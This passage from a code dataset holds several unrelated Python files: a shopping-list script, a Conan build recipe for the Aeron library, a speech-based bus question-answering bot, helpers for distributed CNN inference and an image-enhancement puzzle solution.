option\\n[i] insert [a] delete [l] list [5] to quit \").lower()\n    \n    os.system(\"cls\")\n\n    if opção == \"i\":\n        produtos = input(\"Insert a product: \")\n        lista_de_compras.append(produtos)\n    \n    elif opção == \"l\":\n        for indice, produto in enumerate(lista_de_compras):\n            print(indice, produto)\n    \n    elif opção == \"a\":\n        produto_para_apagar = input(\"Enter the index of the product to delete: \")\n        try:\n            del lista_de_compras[int(produto_para_apagar)]\n        except IndexError:\n            print(\"The given index is not valid\")\n        except ValueError:\n            print(\"The number is not an integer\")\n        except Exception:\n            print(\"Unknown error\")\n\n    elif opção == \"5\":\n        break\n    else:\n        print(f\"{opção} is not a valid option!!\")\n# print(lista_de_compras)","repo_name":"joaocampossss/Prython_Formacao","sub_path":"venv/12.lista_de_compras.py","file_name":"12.lista_de_compras.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31930517285","text":"from conan import ConanFile\nfrom conan.errors import ConanInvalidConfiguration\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.env import VirtualBuildEnv\nfrom conan.tools.files import collect_libs, copy, get, replace_in_file, rename, rm\nfrom conan.tools.microsoft import is_msvc\nfrom conan.tools.scm import Version\nimport glob\nimport os\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass AeronConan(ConanFile):\n    name = \"aeron\"\n    description = \"Efficient reliable UDP unicast, UDP multicast, and IPC message transport\"\n    topics = (\"udp\", \"messaging\", \"low-latency\")\n    url = \"https://github.com/conan-io/conan-center-index\"\n    homepage = \"https://github.com/real-logic/aeron\"\n    license = \"Apache-2.0\"\n\n    package_type = \"library\"\n    settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n    options = {\n        \"shared\": [True, False],\n        \"fPIC\": [True, False],\n        \"build_aeron_driver\": [True, False],\n        \"build_aeron_archive_api\": [True, False],\n    }\n    default_options = {\n        \"shared\": False,\n        \"fPIC\": True,\n        \"build_aeron_driver\": True,\n        \"build_aeron_archive_api\": True,\n    }\n\n    @property\n    def _min_cppstd(self):\n        return \"11\"\n\n    @property\n    def _compilers_minimum_version(self):\n        return {\n            \"Visual Studio\": \"16\",\n            \"msvc\": \"192\",\n            \"gcc\": \"5\",\n        }\n\n    def config_options(self):\n        if self.settings.os == \"Windows\":\n            del self.options.fPIC\n\n    def configure(self):\n        if self.options.shared:\n            self.options.rm_safe(\"fPIC\")\n\n    def layout(self):\n        cmake_layout(self, src_folder=\"src\")\n\n    def validate(self):\n        if self.settings.compiler.get_safe(\"cppstd\"):\n            check_min_cppstd(self, self._min_cppstd)\n\n        minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False)\n        if minimum_version and Version(self.settings.compiler.version) < minimum_version:\n            raise ConanInvalidConfiguration(\n                f\"{self.ref} requires C++{self._min_cppstd}, which your compiler does not support.\"\n            )\n\n        if self.settings.os == \"Macos\" and self.settings.arch == \"armv8\":\n            raise ConanInvalidConfiguration(\"This platform (os=Macos arch=armv8) is not yet supported by this recipe\")\n\n    def build_requirements(self):\n        self.tool_requires(\"zulu-openjdk/11.0.19\")\n\n    def source(self):\n        get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n    def generate(self):\n        env = VirtualBuildEnv(self)\n        env.generate()\n        tc = CMakeToolchain(self)\n        tc.cache_variables[\"BUILD_AERON_DRIVER\"] = self.options.build_aeron_driver\n        tc.cache_variables[\"BUILD_AERON_ARCHIVE_API\"] = self.options.build_aeron_archive_api\n        tc.cache_variables[\"AERON_TESTS\"] = False\n        tc.cache_variables[\"AERON_SYSTEM_TESTS\"] = False\n        tc.cache_variables[\"AERON_SLOW_SYSTEM_TESTS\"] = False\n        tc.cache_variables[\"AERON_BUILD_SAMPLES\"] = False\n        tc.cache_variables[\"AERON_BUILD_DOCUMENTATION\"] = False\n        tc.cache_variables[\"AERON_INSTALL_TARGETS\"] = True\n        tc.cache_variables[\"AERON_ENABLE_NONSTANDARD_OPTIMIZATIONS\"] = True\n        # The finite-math-only optimization has no effect and can cause linking errors\n        # when linked against glibc >= 2.31\n        
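        # Aside (illustrative, not part of the upstream recipe): CMakeToolchain
        # assembles conan_toolchain.cmake from named template blocks; appending to
        # the "cmake_flags_init" block's template, as done just below, injects the
        # flag into CMAKE_C_FLAGS_INIT / CMAKE_CXX_FLAGS_INIT for every
        # configuration, whereas the tc.cache_variables entries above only seed
        # CMake cache variables.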
tc.blocks[\"cmake_flags_init\"].template += (\n            'string(APPEND CMAKE_CXX_FLAGS_INIT \" -fno-finite-math-only\")\\n'\n            'string(APPEND CMAKE_C_FLAGS_INIT \" -fno-finite-math-only\")\\n'\n        )\n        tc.generate()\n\n    def _patch_sources(self):\n        replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"), \"/MTd\", \"\")\n        replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"), \"/MT\", \"\")\n\n    def build(self):\n        self._patch_sources()\n        cmake = CMake(self)\n        cmake.configure()\n        cmake.build()\n\n    def package(self):\n        copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n        cmake = CMake(self)\n        cmake.install()\n\n        archive_resources_dir = os.path.join(self.source_folder, \"aeron-archive\", \"src\", \"main\", \"resources\")\n        copy(self, \"*\", src=archive_resources_dir, dst=os.path.join(self.package_folder, \"res\"))\n\n        archive_include_dir = os.path.join(self.source_folder, \"aeron-archive\", \"src\", \"main\", \"cpp\", \"client\")\n        copy(self, \"*.h\", src=archive_include_dir, dst=os.path.join(self.package_folder, \"include\", \"aeron-archive\"))\n\n        lib_folder = os.path.join(self.package_folder, \"lib\")\n        bin_folder = os.path.join(self.package_folder, \"bin\")\n        for dll in glob.glob(os.path.join(lib_folder, \"*.dll\")):\n            rename(self, dll, os.path.join(bin_folder, os.path.basename(dll)))\n\n        if self.options.shared:\n            for lib in glob.glob(os.path.join(lib_folder, \"*.a\")):\n                if not lib.endswith(\".dll.a\"):\n                    os.remove(lib)\n            rm(self, \"*static.lib\", lib_folder)\n            rm(self, \"aeron_client.lib\", lib_folder)\n        else:\n            rm(self, \"*.dll\", bin_folder)\n            rm(self, \"*.so*\", lib_folder)\n            rm(self, \"*.dylib\", lib_folder)\n            rm(self, \"*.dll.a\", lib_folder)\n            rm(self, \"*shared.lib\", lib_folder)\n            rm(self, \"aeron.lib\", lib_folder)\n\n    def package_info(self):\n        self.cpp_info.libs = collect_libs(self)\n        if is_msvc(self):\n            self.cpp_info.defines.append(\"_ENABLE_EXTENDED_ALIGNED_STORAGE\")\n        if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n            self.cpp_info.system_libs.extend([\"dl\", \"m\", \"pthread\"])\n        elif self.settings.os == \"Windows\":\n            self.cpp_info.system_libs = [\"winmm\", \"wsock32\", \"ws2_32\", \"iphlpapi\"]\n            self.cpp_info.defines.append(\"HAVE_WSAPOLL\")\n\n        # TODO: to remove in conan v2\n        self.env_info.PATH.append(os.path.join(self.package_folder, \"bin\"))\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/aeron/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"764026644","text":"\n############## Speech to Text ##############\nimport numpy as np\nimport wave\nimport pyaudio\nimport time\n\nimport noisereduce as nr\n\nfrom transformers import Wav2Vec2Processor, Wav2Vec2ForCTC\nfrom transformers import pipeline\nimport torch\n\nimport librosa\n\nLANG_ID = \"en\"\nMODEL_ID = \"jonatasgrosman/wav2vec2-large-xlsr-53-english\"\nSAMPLES = 10\n\nspeech_to_text_processor = Wav2Vec2Processor.from_pretrained(MODEL_ID)\nspeech_to_text_model = Wav2Vec2ForCTC.from_pretrained(MODEL_ID)\n\ndef save_audio_file(seconds=5, CHUNK = 1024, FORMAT = pyaudio.paInt16, CHANNELS = 1, RATE = 22050):\n    # Record the audio\n    p = pyaudio.PyAudio()\n    stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)\n    print(\"Started Recording for \" + str(seconds) + \" seconds...\")\n    frames = []\n    \n    for i in range(0, int(RATE/CHUNK * 
seconds)):\n        data = stream.read(CHUNK)\n        frames.append(data)\n    \n    print(\"Recording Stopped..\")\n    stream.stop_stream()\n    stream.close()\n    p.terminate()\n    \n    #Saving the audio\n    file_name = 'output_' + str(int(time.time())) + '.wav' \n    wf = wave.open(\"./Dataset/Temp/\"+file_name, 'wb')\n    wf.setnchannels(CHANNELS)\n    wf.setsampwidth(p.get_sample_size(FORMAT))\n    wf.setframerate(RATE)\n    wf.writeframes(b''.join(frames))\n    wf.close()\n    \n    return file_name\n\ndef speech_to_text(model, processor, audio_file):\n    data, sample_rate = librosa.load(audio_file, sr=16000)\n    reduced_noise = nr.reduce_noise(y=data, sr=sample_rate)\n    input_values = processor(reduced_noise, sampling_rate=sample_rate, return_tensors=\"pt\", padding=\"longest\").input_values\n    logits = model(input_values).logits\n    predicted_ids = torch.argmax(logits, dim=-1)\n    transcription = processor.batch_decode(predicted_ids)\n    return transcription\n\n# speech_to_text(model, processor, '../Dataset/Temp/output_1663921799.wav')\n\n\n############## Question Answering ##############\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport itertools\n\nquestion_answer = pipeline(\"question-answering\", model=\"deepset/electra-base-squad2\", top_k=5)\n\nf = open(\"./Dataset/context.txt\", \"r\")\ncontext = f.read()\nf.close()\n\ndef max_sum_sim(doc_embedding, candidate_embeddings, candidates, top_n, nr_candidates):\n    # Calculate distances and extract keywords\n    distances = cosine_similarity(doc_embedding, candidate_embeddings)\n    distances_candidates = cosine_similarity(candidate_embeddings, \n                                            candidate_embeddings)\n\n    # Get top_n words as candidates based on cosine similarity\n    words_idx = list(distances.argsort()[0][-nr_candidates:])\n    words_vals = [candidates[index] for index in words_idx]\n    distances_candidates = distances_candidates[np.ix_(words_idx, words_idx)]\n\n    # Calculate the combination of words that are the least similar to each other\n    min_sim = np.inf\n    candidate = None\n    for combination in itertools.combinations(range(len(words_idx)), top_n):\n        sim = sum([distances_candidates[i][j] for i in combination for j in combination if i != j])\n        if sim < min_sim:\n            candidate = combination\n            min_sim = sim\n\n    if(candidate): \n        return [words_vals[idx] for idx in candidate]\n    else:\n        return []\n\ndef mmr(doc_embedding, word_embeddings, words, top_n, diversity):\n\n    # Extract similarity within words, and between words and the document\n    word_doc_similarity = cosine_similarity(word_embeddings, doc_embedding)\n    word_similarity = cosine_similarity(word_embeddings)\n\n    # Initialize candidates and already choose best keyword/keyphrase\n    keywords_idx = [np.argmax(word_doc_similarity)]\n    candidates_idx = [i for i in range(len(words)) if i != keywords_idx[0]]\n\n    for _ in range(top_n - 1):\n        # Extract similarities within candidates and\n        # between candidates and selected keywords/phrases\n        candidate_similarities = word_doc_similarity[candidates_idx, :]\n        target_similarities = np.max(word_similarity[candidates_idx][:, keywords_idx], axis=1)\n\n        # Calculate MMR\n        mmr = (1-diversity) * candidate_similarities - diversity * target_similarities.reshape(-1, 1)\n        if(mmr.size > 0):\n            mmr_idx = candidates_idx[np.argmax(mmr)]\n\n            # Update keywords & candidates\n            keywords_idx.append(mmr_idx)\n            candidates_idx.remove(mmr_idx)\n\n    return [words[idx] for idx in keywords_idx]\n\ndef get_keywords_keyBert(sentences, 
model_name='distilbert-base-nli-mean-tokens', n_gram_range=(1, 2), stop_words=\"english\", top_n=10, diversification=None, nr_candidates=15, diversity=0.5):\n    #Get candidate phrases\n    count = CountVectorizer(ngram_range=n_gram_range, stop_words=stop_words).fit([sentences])\n    candidates = count.get_feature_names_out()\n    \n    #Load Model\n    model = SentenceTransformer(model_name)\n    doc_embedding = model.encode([sentences])\n    candidate_embeddings = model.encode(candidates)\n    \n    #Calculate distance between embeddings to find similarity\n    if(diversification == None):\n        distances = cosine_similarity(doc_embedding, candidate_embeddings)\n        keywords = [candidates[index] for index in distances.argsort()[0][-top_n:]]\n    elif(diversification == 'max_sum_sim'):\n        keywords = max_sum_sim(doc_embedding, candidate_embeddings, candidates, top_n=top_n, nr_candidates=nr_candidates)\n    elif(diversification == 'mmr'):\n        keywords = mmr(doc_embedding, candidate_embeddings, candidates, top_n=top_n, diversity=diversity)\n    \n    return list(set(keywords))\n\ndef get_short_context(question, context):\n    keywords = get_keywords_keyBert(question, model_name='all-MiniLM-L6-v2', n_gram_range=(1, 1), diversification='mmr', top_n=3, diversity=0.8)\n    possible_context = set()\n    for keyword in keywords:\n        for sent in context.split('. '):\n            if keyword in sent.lower():\n                possible_context.add(sent)\n    possible_context = list(possible_context)\n    possible_context = '. '.join(possible_context)\n    \n    return possible_context\n\ndef get_answers(question, context):\n    short_context = get_short_context(question, context)\n    qa_input = {\n        'question': question,\n        'context': short_context  # use the keyword-filtered context computed above\n    }\n    res = question_answer(qa_input)\n    final_answers = set()\n    for r in res:\n        if(r['score'] > 0.99):\n            final_answers.add(r['answer'])\n    \n    answers = list(final_answers)\n    if(len(answers) == 0):\n        return 'No buses available for this route and time'\n    else:\n        return ', '.join(answers)\n\n########################### Text to Speech ###########################\nimport torchaudio\nfrom speechbrain.pretrained import Tacotron2\nfrom speechbrain.pretrained import HIFIGAN\nfrom playsound import playsound\n\ntacotron2 = Tacotron2.from_hparams(source=\"speechbrain/tts-tacotron2-ljspeech\", savedir=\"./Notebooks/tmpdir_tts\")\nhifi_gan = HIFIGAN.from_hparams(source=\"speechbrain/tts-hifigan-ljspeech\", savedir=\"./Notebooks/tmpdir_vocoder\")\n\ndef text_to_speech(text):\n    mel_output, mel_length, alignment = tacotron2.encode_text(text)\n    waveforms = hifi_gan.decode_batch(mel_output)\n    file_name = 'result_' + str(int(time.time())) + '.wav' \n    torchaudio.save('./Dataset/Temp/'+file_name, waveforms.squeeze(1), 22050)\n    \n    return file_name\n\n########################### Runner Function ###########################\n\nimport speech_recognition as sr\n\nr = sr.Recognizer()\n\ndef record_audio():\n    print(\"Ask the Question...\")\n    with sr.Microphone() as source:\n        audio = r.listen(source)\n        voice_data = ''\n        try:\n            voice_data = r.recognize_google(audio)\n        except sr.UnknownValueError:\n            return \"Sorry, I didn't get that\"\n        except sr.RequestError:\n            return \"Sorry, My Speech service is down\"\n\n    return voice_data \n\nif __name__ == '__main__':\n    print(\"Bus Buddy Started\")\n    # input_file_name = save_audio_file()\n    # input_question = speech_to_text(speech_to_text_model, speech_to_text_processor, './Dataset/Temp/'+input_file_name)\n    # print(input_question)\n    input_question = record_audio()\n    print(input_question)\n    output_answers = get_answers(input_question, context)\n    print(output_answers)\n    
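    # Aside (illustrative, not part of the original script): mmr() above trades off
    # relevance against redundancy per candidate:
    #     score = (1 - diversity) * sim(candidate, doc)
    #             - diversity * max(sim(candidate, already_selected))
    # With diversity=0.8 (the value used in get_short_context), a candidate with
    # doc-similarity 0.9 that is 0.95 similar to an already chosen keyword scores
    # 0.2*0.9 - 0.8*0.95 = -0.58, so a less redundant candidate with doc-similarity
    # 0.6 and max overlap 0.3 (score 0.2*0.6 - 0.8*0.3 = -0.12) is picked first.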
output_file_name = text_to_speech(output_answers)\n print(output_answers)\n playsound('./Dataset/Temp/'+output_file_name)","repo_name":"Nihal-Srivastava05/Conversational-Speech-bot","sub_path":"ConversationalSpeechBot.py","file_name":"ConversationalSpeechBot.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23432000169","text":"from util import *\nfrom ExecutionUnit import ExecutionUnit\nfrom models.googlenet import BasicConv2d\nimport queue\nimport numpy as np\nimport torch.nn as nn\n\ndef translate_next_array(next_array):\n for i in range(len(next_array)): # 将next数组内的单个元素处理为长度为1的列表\n if not isinstance(next_array[i], list):\n next_array[i] = [next_array[i]]\n\n\ndef next_to_last(next): # 将next数组转化为last数组,即last数组\n total = len(next)\n last = [[] for _ in range(total)]\n # last_array[0].append(-1) # -1 represents the original input\n for i, nexts in enumerate(next):\n for l in nexts:\n last[l].append(i)\n return last\n\n\n# print(len(layers))\n# layers_dependency = next_to_last(next_array)\n\n\ndef topology_DAG(next_array, last_array): # transfer the DAG network to topology list, starts from 0, bfs\n total = len(next_array)\n in_num = np.zeros(total)\n for i in range(total):\n in_num[i] = len(last_array[i])\n q = queue.Queue()\n q.put(0)\n ans = []\n while not q.empty():\n ele = q.get()\n ans.append(ele)\n if isinstance(next_array[ele], list):\n for i in next_array[ele]:\n in_num[i] -= 1\n if in_num[i] == 0:\n q.put(i)\n else:\n in_num[next_array[ele]] -= 1\n if in_num[next_array[ele]] == 0:\n q.put(next_array[ele])\n return ans\n\n\n# average distribution\n# output features range of layer\n\n\ndef cal_output_shape(net, topology_list, last_array):\n layers = net.layers\n n_layers = len(topology_list)\n output_shapes = [[] for _ in range(n_layers)]\n mark = np.zeros(n_layers)\n for lth in topology_list:\n mark[lth] = 1\n if layers[lth] == 'concat':\n inputs = []\n for last in last_array[lth]:\n inputs.append(torch.randn(output_shapes[last]))\n output = torch.cat(inputs, 1)\n\n else:\n if lth == 0:\n input_shape = 1, *net.input_shape\n else:\n input_shape = output_shapes[last_array[lth][0]]\n x = torch.randn(input_shape)\n this_layer = net.layers[lth]\n if isinstance(this_layer, nn.Linear):\n x = torch.flatten(x, 1)\n output = this_layer(x)\n output_shapes[lth] = output.shape\n\n return output_shapes\n\n\ndef cal_output(layers, topology_list, last_array, x):\n n_layers = len(topology_list)\n outputs = [None for _ in range(n_layers)]\n mark = np.zeros(n_layers)\n for lth in topology_list:\n if lth == 0:\n outputs[0] = layers[0](x)\n continue\n mark[lth] = 1\n if layers[lth] == 'concat':\n inputs = [outputs[i] for i in last_array[lth]]\n output = torch.cat(inputs, 1)\n else:\n assert len(last_array[lth]) == 1\n last_layer = last_array[lth][0]\n output = layers[lth](outputs[last_layer])\n outputs[lth] = output\n return outputs\n\n\n# layers_output_shapes = cal_output_shape(model, topology_layers, layers_dependency)\n\n\n# def cal_inputFromOutput(output_shapes, last_layers):\n# n_layers = len(output_shapes)\n# input_shapes = [[] for _ in range(n_layers)]\n# for nl in topology_layers:\n# if nl == 0:\n# input_shape = [1, 3, 224, 224]\n# else:\n# lasts = last_layers[nl]\n# if len(lasts) == 1:\n# last_array = lasts[0]\n# input_shape = output_shapes[last_array]\n# else: # have over 1 last_array layers\n# input_shape = []\n# for last_array in lasts:\n# 
input_shape.append(output_shapes[last_array])\n# input_shapes[nl] = input_shape\n# return input_shapes\n#\n#\n# # compute the layers' output shape and store in model\n# model.input_shapes = cal_inputFromOutput(layers_output_shapes, layers_dependency)\n\n\n# print(model.output_shapes)\n\n\n# partitioning dimension: -1 # 假设从最后一维开始切\ndef workload_partition(output_shapes, num_device): # temporarily average\n partitions = []\n for i, shape in enumerate(output_shapes):\n # if layers[i] == 'concat':\n # partitions.append(1)\n # else:\n length = shape[-1]\n partition = [0 for _ in range(num_device + 1)]\n partition[-1] = length\n average = round(length / num_device)\n for i in range(1, num_device):\n partition[i] = average * i\n partitions.append(partition)\n return partitions\n\n\n# def random_workload_partition(output_shapes, num_device):\n# partitions = []\n# for i, shape in enumerate(output_shapes):\n# length = shape[-1]\n# partition = []\n# cnt = 0\n# while cnt < num_device - 1:\n# p = random.randint(1, length - 1)\n# if p not in partition:\n# cnt += 1\n# partition.append(p)\n# partition.sort()\n# partition = [0, *partition, length]\n# partitions.append(partition)\n# return partitions\n\n\ndef generate_layerConfigs(layers: list):\n configs = []\n for layer in layers:\n if isinstance(layer, BasicConv2d):\n conv = layer.conv\n layer_config = {'type': 'basicConv', 'kernel_size': conv.kernel_size, 'stride': conv.stride,\n 'padding': conv.padding} # , 'bn_args': (bn.weight, bn.bias, False, bn.momentum, bn.eps)}\n elif isinstance(layer, nn.Conv2d):\n layer_config = {'type': 'basicConv', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding}\n elif isinstance(layer, nn.ReLU):\n layer_config = {'type': 'relu', 'inplace': layer.inplace}\n elif isinstance(layer, nn.MaxPool2d):\n layer_config = {'type': 'maxpool', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding, 'ceil_mode': layer.ceil_mode}\n elif isinstance(layer, nn.Upsample):\n layer_config = {'type': 'upsample', 'scale_factor': layer.scale_factor}\n elif layer == 'concat':\n layer_config = {'type': layer}\n else: # only given kinds of layers\n layer_config = None\n print('This type of layer is not supported yet')\n configs.append(layer_config)\n\n return configs\n\n\ndef generate_layerConfig(layer):\n if isinstance(layer, BasicConv2d):\n conv = layer.conv\n layer_config = {'type': 'basicConv', 'kernel_size': conv.kernel_size, 'stride': conv.stride,\n 'padding': conv.padding} # , 'bn_args': (bn.weight, bn.bias, False, bn.momentum, bn.eps)}\n elif isinstance(layer, nn.Conv2d):\n layer_config = {'type': 'conv', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding}\n elif isinstance(layer, nn.MaxPool2d):\n layer_config = {'type': 'maxpool', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding, 'ceil_mode': layer.ceil_mode}\n elif isinstance(layer, nn.Upsample):\n layer_config = {'type': 'upsample', 'scale_factor': layer.scale_factor}\n elif layer == 'concat':\n layer_config = {'type': layer}\n else: # only given kinds of layers\n layer_config = None\n print('This type of layer is not supported yet')\n\n return layer_config\n\n\n# from output range to input range\ndef output_input(output_range: tuple, layer_config=None) -> tuple:\n o_s, o_e = output_range\n layer_type = layer_config['type']\n if layer_type in ['relu', 'concat']: # most activation layers\n return output_range\n elif layer_type == 'upsample':\n scale_factor = 
\n\n\n# generate execution units\ndef gen_inputDependency(model, layer_list, topology_list, output_partitions, last_array):\n    # required input: from which layer, input range (in the -1 dimension)\n    ids = [list() for _ in range(len(topology_list))]\n    for l in topology_list: # the current layer\n        partition = output_partitions[l]\n\n        # if layers[l] == 'concat':\n        #     last_division = tuple(len(partitions[last_layer]) - 1 for last_layer in last_array[l])\n        #     required_input = (last_array[l], last_division)\n        #     layer_config = {'type': 'concat'}\n        #     ids[l].append((required_input, layer_config, []))\n        # else:\n        if l == 0:\n            H = model.input_shape[-1]\n        else:\n            H = model.output_shapes[last_array[l][0]][-1]\n        for i in range(len(partition) - 1):\n            # get output range\n            output_range = partition[i: i + 2] # [o_s, o_e)\n            layer = layer_list[l]\n            # get corresponding input range\n            if isinstance(layer, BasicConv2d):\n                # type = 'conv'\n                # if isinstance(layer, BasicConv2d):\n                conv = layer.conv\n                # bn = layer.bn\n                type = 'basicConv'\n                layer_config = {'type': type, 'kernel_size': conv.kernel_size, 'stride': conv.stride,\n                                'padding': conv.padding} #, 'bn_args': (bn.weight, bn.bias, False, bn.momentum, bn.eps)}\n                i_s, i_e = input_range = output_input(output_range, layer_config) # [i_s, i_e)\n                if conv.padding == 0:\n                    padding = (0, 0, 0, 0)\n                else:\n                    if i_s < 0:\n                        upper_padding = -i_s\n                        i_s = 0\n                    else:\n                        upper_padding = 0\n                    if i_e > H:\n                        bottom_padding = i_e - H\n                        i_e = H\n                    else:\n                        bottom_padding = 0\n                    padding = (upper_padding, bottom_padding, *conv.padding)\n                    input_range = (i_s, i_e)\n                layer_config['padding'] = padding\n\n            elif isinstance(layer, nn.MaxPool2d): # padding = 0 for most maxpool layers\n                layer_config = {'type': 'maxpool', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n                                'padding': layer.padding, 'ceil_mode': layer.ceil_mode}\n                i_s, i_e = input_range = output_input(output_range, layer_config) # [i_s, i_e)\n\n                if layer.padding == 0:\n                    padding = (0, 0)\n                else:\n                    padding = layer.padding\n                # else:\n                if i_s < 0:\n                    upper_padding = -i_s\n                    i_s = 0\n                else:\n                    upper_padding = 0\n                if i_e > H:\n                    bottom_padding = i_e - H\n                    i_e = H\n                else:\n                    bottom_padding = 0\n                padding = (upper_padding, bottom_padding, *padding)\n                input_range = (i_s, i_e)\n                layer_config['padding'] = padding\n\n            elif isinstance(layer, nn.Upsample):\n                layer_config = {'type': 'upsample', 'scale_factor': layer.scale_factor}\n                input_range = output_input(output_range, layer_config)\n            elif layer == 'concat':\n                layer_config = {'type': layer}\n                input_range = output_range\n            elif isinstance(layer, (nn.Sigmoid, nn.ReLU, nn.Dropout, nn.BatchNorm2d)):\n                layer_config = {'type': 'bijective'}\n                input_range = output_range\n            else:\n                input_range = None\n                layer_config = None\n\n            required_input = (last_array[l], input_range)\n            ids[l].append((required_input, layer_config, []))\n\n    return ids\n\n\n# for w in workload_dependency:\n#     print(w)\n\n\n# def gen_forwarding(input_dependency: list, topology_list: list, dependency_list: list):\n#     for nl in topology_list: # this layer\n#         lasts = dependency_list[nl]\n#         if len(lasts) == 1: # only depends on one layer, can be the next_array layer of concat\n#             for i, n in enumerate(input_dependency[nl]): # execution units of this layer\n#                 last_layer, input_range = n[0]\n#                 last_layer = last_layer[0]\n#                 last_partition = partitions[last_layer] # partition of last_array layer's output\n#                 if last_partition == 1: # last_array layer is concat, has whole input\n#                     input_dependency[last_layer][0][2].append((i, input_range))\n#                 else:\n#                     # formation = [] # the formation of layer's input\n#                     for j in range(len(last_partition) - 1):\n#                         left_max = max(last_partition[j], input_range[0])\n#                         right_min = min(last_partition[j + 1], input_range[1])\n#                         if left_max < right_min: # overlap\n#                             overlap = (left_max, right_min)\n#                             input_dependency[last_layer][j][2].append((i, overlap))\n#                             # formation.append((n, overlap))\n#         else: # concat layer\n#             for last_array in lasts:\n#                 last_partition = partitions[last_array]\n#                 for i in range(len(last_partition) - 1):\n#                     input_dependency[last_array][i][2].append((0, (partitions[last_array][i], partitions[last_array][i + 1])))
\n\n\ndef gen_forwarding(n_device: int, input_dependency, topology_list, next_layers, output_partitions):\n    for l in topology_list: # layer l\n        nexts = next_layers[l] # next_array layers\n        partition = output_partitions[l]\n        if len(nexts) == 0: # output of final layer should send back to master\n            continue\n        # input_dependency[l][0][2].append(1)\n        # if layers[l] == 'concat': # layer l is concat\n        #     forwarding = [[] for _ in range(n_device)]\n        #     for nl in nexts:\n        #         for i, eu in enumerate(input_dependency[nl]):\n        #             input_range = eu[0][1]\n        #             forwarding[i].append(input_range)\n        #     for to_device, f in enumerate(forwarding): # d is the device id\n        #         if len(f) > 0: # deduplicate by destination device id\n        #             for interval in get_set_union(f):\n        #                 input_dependency[l][0][2].append((to_device, interval))\n        # elif len(nexts) == 1 and layers[nexts[0]] == 'concat': # next_array layer is concat\n        #     for i in range(len(partition) - 1):\n        #         input_dependency[l][i][2].append((0, (0, partition[i + 1] - partition[i]), partition[i]))\n        # else: # no concat layer between this layer and next_array layer\n        for nl in nexts:\n            for i in range(len(partition) - 1):\n                forwarding = [[] for _ in range(n_device)] # forwarding lists before deduplication\n                for j, eu in enumerate(input_dependency[nl]):\n                    _, input_range = eu[0]\n                    overlap = get_intersection((partition[i], partition[i + 1]), input_range)\n                    if overlap is not None:\n                        forwarding[j].append(overlap)\n                for to_device, f in enumerate(forwarding): # d: device_id\n                    if len(f) > 0: # merge the intervals sent to the same destination device\n                        for interval in get_set_union(f):\n                            input_dependency[l][i][2].append(\n                                (to_device, (interval[0] - partition[i], interval[1] - partition[i]), partition[i]))\n\n\n# for eu in workload_dependency:\n#     print(eu)
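\n\n# Worked example for gen_forwarding above (hypothetical numbers): if layer l's output\n# is partitioned as [0, 4, 8] over two devices and one execution unit of the next layer\n# needs input rows (2, 6), then device 0 forwards (2, 4) and device 1 forwards (4, 6);\n# each interval is stored relative to its own partition start.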
\n\n\ndef gen_executionUnits(n_device: int, workload_partition, topology_list):\n    device_group = [[] for _ in range(n_device)]\n    for l in topology_list: # current layer\n        for i, eu in enumerate(workload_partition[l]):\n            device_group[i].append(\n                ExecutionUnit(required_input=eu[0], operator=eu[1], forwarding=eu[2], layer_num=l, device_num=i))\n    return device_group","repo_name":"Leosang-lx/DistributedInference","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13810166072","text":"import numpy as np\nwith open('input.txt') as f:\n    data = f.read().split('\\n')\n\n\ndef translate_pixel(char):\n    if char == '#':\n        return 1\n    if char == '.':\n        return 0\n\n\nIMAGE_DICTIONARY = [translate_pixel(char) for char in data[0]]\nNUM_ENHANCEMENTS = 50\nFLIP_EDGES = True\n\nbase_image = np.array([[translate_pixel(char) for char in entry] for entry in data[2:]])\n\nexpansion = 4*NUM_ENHANCEMENTS+4\nIMAGE = np.zeros((base_image.shape[0]+expansion, base_image.shape[1]+expansion))\n\nIMAGE[2*NUM_ENHANCEMENTS+2:-2*NUM_ENHANCEMENTS-2, 2*NUM_ENHANCEMENTS+2:-2*NUM_ENHANCEMENTS-2] = base_image\n\n\ndef process(image, edges, image_dictionary=IMAGE_DICTIONARY):\n    output_image = np.zeros(shape=image.shape)\n    for column in range(1, image.shape[1] - 1):\n        k = 2\n        row0 = (image[0, column-1:column+2]*np.array([4,2,1])).sum()\n        row1 = (image[1, column-1:column+2]*np.array([4,2,1])).sum()\n        row2 = (image[k, column-1:column+2]*np.array([4,2,1])).sum()\n        output_image[k-1, column] = image_dictionary[int(row2 + 8*row1 + 64*row0)]\n        while k + 1 < image.shape[0]:\n            # advance the three-row window before recomputing, so output row k-1\n            # is always built from input rows k-2, k-1 and k\n            k += 1\n            row0 = row1\n            row1 = row2\n            row2 = (image[k, column-1:column+2]*np.array([4,2,1])).sum()\n            output_image[k - 1, column] = image_dictionary[int(row2 + 8 * row1 + 64 * 